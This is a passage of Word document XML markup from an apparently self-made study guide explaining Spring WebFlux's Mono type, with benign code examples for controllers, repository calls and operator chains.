    <w:p w14:paraId="53DFB01F" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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public Mono&lt;String&gt; greet() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="477474CC" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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    return Mono.just("Hello, Siddhant!");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B1804A" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="099369FB" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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This sends "Hello, Siddhant!" as a </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive single response</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77558684" w14:textId="77777777" w:rsidR="004F1704"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310DCA9">
          <v:rect id="_x0000_i2225" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="271668F8" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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Mono for DB Calls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21C5C50B" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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GetMapping("/user/{id}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B24ED65" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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public Mono&lt;User&gt; getUserById(@PathVariable String id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12B41097" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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    return userRepository.findById(id);  // returns Mono&lt;User&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ED1C9E" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="436F8FDF" w14:textId="77777777" w:rsidR="004F1704"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8EDF007">
          <v:rect id="_x0000_i2226" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EF39E0" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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Mono.empty() and Mono.error()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="598C1460" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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Mono.empty();               // emits no value, just completes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DF68415" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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Mono.error(new Exception()); // emits an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25361856" w14:textId="77777777" w:rsidR="004F1704"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B1DEB99">
          <v:rect id="_x0000_i2227" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="275054B7" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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6"/>
        <w:gridCol w:w="2797"/>
      </w:tblGrid>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="61BF956A" w14:textId="77777777" w:rsidTr="004F1704">
        <w:trPr>
          <w:tblHeader/>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4FCEB02B" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Feature</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="47494A98" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704" w:rsidP="00372576">
            <w:pPr>
              <w:jc w:val="both"/>
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="00372576">
              <w:rPr>
                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="22"/>
                <w:szCs w:val="22"/>
              </w:rPr>
              <w:t>Description</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="3EB44492" w14:textId="77777777" w:rsidTr="004F1704">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="0DD3E871" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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Type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1588DDDE" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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Mono&lt;T&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="27A9EA8E" w14:textId="77777777" w:rsidTr="004F1704">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="24B7745A" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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Emits</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="2CF755F9" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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0 or 1 item</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="33B1EB7A" w14:textId="77777777" w:rsidTr="004F1704">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="3C980CCC" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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Completion</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="302FC554" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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Completes after emission</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00372576" w:rsidRPr="00372576" w14:paraId="08ABDF2C" w14:textId="77777777" w:rsidTr="004F1704">
        <w:trPr>
          <w:tblCellSpacing w:w="15" w:type="dxa"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="4BA3777E" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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Alternative</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="592C0440" w14:textId="77777777" w:rsidR="004F1704" w:rsidRPr="00372576" w:rsidRDefault="004F1704"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Use Flux&lt;T&gt; for multiple items</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="21A4D043"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E57E75C">
          <v:rect id="_x0000_i2228" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D5F5A95" w14:textId="4BD98E12"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488" w:name="_Toc196307968"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Explain how Mono works</w:t>
      </w:r>
      <w:r w:rsidR="00163F3B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="488"/>
    </w:p>
    <w:p w14:paraId="3FE8B1A6" w14:textId="1F853540" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7" w:rsidP="00372576">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Here's a clear breakdown of </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>how Mono works</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring WebFlux</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF3F2E9" w14:textId="77777777" w:rsidR="00E034E7"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567A3D4">
          <v:rect id="_x0000_i2229" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BACB09" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7"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Mono Lifecycle</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0BCB72"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A Mono&lt;T&gt; is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive Publisher</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7188B093"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Subscribes</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to a data source</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23EAE147"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Emits 0 or 1 value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04D12D99"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Completes</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Errors</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF0106"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It's </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>lazy</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> — it doesn’t do anything until </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>subscribed</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B673719" w14:textId="77777777" w:rsidR="00E034E7"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404E106">
          <v:rect id="_x0000_i2230" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="11B96D7C" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7"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Internally, Mono goes through:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11A9F8C1"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Creation</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40B8BB43" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7" w:rsidP="00372576">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Mono.just(value) → wraps a single value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09F4C732" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7" w:rsidP="00372576">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Mono.empty() → emits nothing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8A7214" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7" w:rsidP="00372576">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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Mono.error(e) → emits an error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7047237B"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Subscription</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74292B0E" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7" w:rsidP="00372576">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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A subscriber subscribes to the Mono</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A659E36" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7" w:rsidP="00372576">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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This triggers the processing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57736DA2"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Signal Emission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0241CEE6" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7" w:rsidP="00372576">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="1440"/>
        </w:tabs>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One of the following happens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31AB0860" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7" w:rsidP="00372576">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>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onNext(value) → emits value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096D14E9" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7" w:rsidP="00372576">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>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onComplete() → marks it done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38C7E472" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7" w:rsidP="00372576">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="num" w:pos="2160"/>
        </w:tabs>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onError(e) → emits error</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6793ACEC" w14:textId="77777777" w:rsidR="00E034E7"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A3950F6">
          <v:rect id="_x0000_i2231" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="275DCCD3" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7"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Control Flow Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5487947E"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Mono&lt;String&gt; mono = Mono.just("Hi")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70587771"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    .map(s -&gt; s + " Siddhant")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CEB29CF"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    .doOnNext(System.out::println)   // side effect</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AF9223"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    .doOnSuccess(val -&gt; System.out.println("Done"));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E861B6F" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7" w:rsidP="00372576">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="09D75F8C"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mono.subscribe();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="267938C1"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Segoe UI Emoji" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>🧠</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>What happens:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1383151D"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Mono is created</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CDBA93"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map() transforms the data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7B665B"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doOnNext() logs it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42127971"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subscribe() starts the chain</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C9A95C" w14:textId="77777777" w:rsidR="00E034E7"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3E3C689">
          <v:rect id="_x0000_i2232" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="287308F0" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7"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Operator Chain (Declarative)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="602AA2D9"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Mono supports operators like:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB6397E"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map() – transform data</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FC88EBD"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lastRenderedPageBreak/>
        <w:t>.flatMap() – chain Monos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1894B8"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filter() – conditionally pass values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="760E2930"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doOnNext() – side effects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184F082E"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switchIfEmpty() – handle empty values</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AF99C5C" w14:textId="77777777" w:rsidR="00E034E7"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4442F17">
          <v:rect id="_x0000_i2233" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="44F0527C" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7"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Example: Saving User</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52992973"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PostMapping("/save")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58D808C7"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public Mono&lt;ResponseEntity&lt;User&gt;&gt; saveUser(@RequestBody User user) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72D598A0"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    return userRepository.save(user) // returns Mono&lt;User&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="074D2645"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        .map(savedUser -&gt; ResponseEntity.ok(savedUser));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35C1C729"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66023C2B" w14:textId="77777777" w:rsidR="00E034E7"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6CF5D78">
          <v:rect id="_x0000_i2234" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ECB3A60" w14:textId="77777777" w:rsidR="00E034E7" w:rsidRPr="00372576" w:rsidRDefault="00E034E7"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Behind the scenes:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="558B5F46"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Mono works with </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>reactive streams</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ED2D792"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It handles </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>backpressure</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A4DF65"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It's </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="251AF9FD"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Integrated with </w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Reactor Core scheduler</w:t>
      </w:r>
      <w:r w:rsidRPr="00372576">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for async execution</w:t>
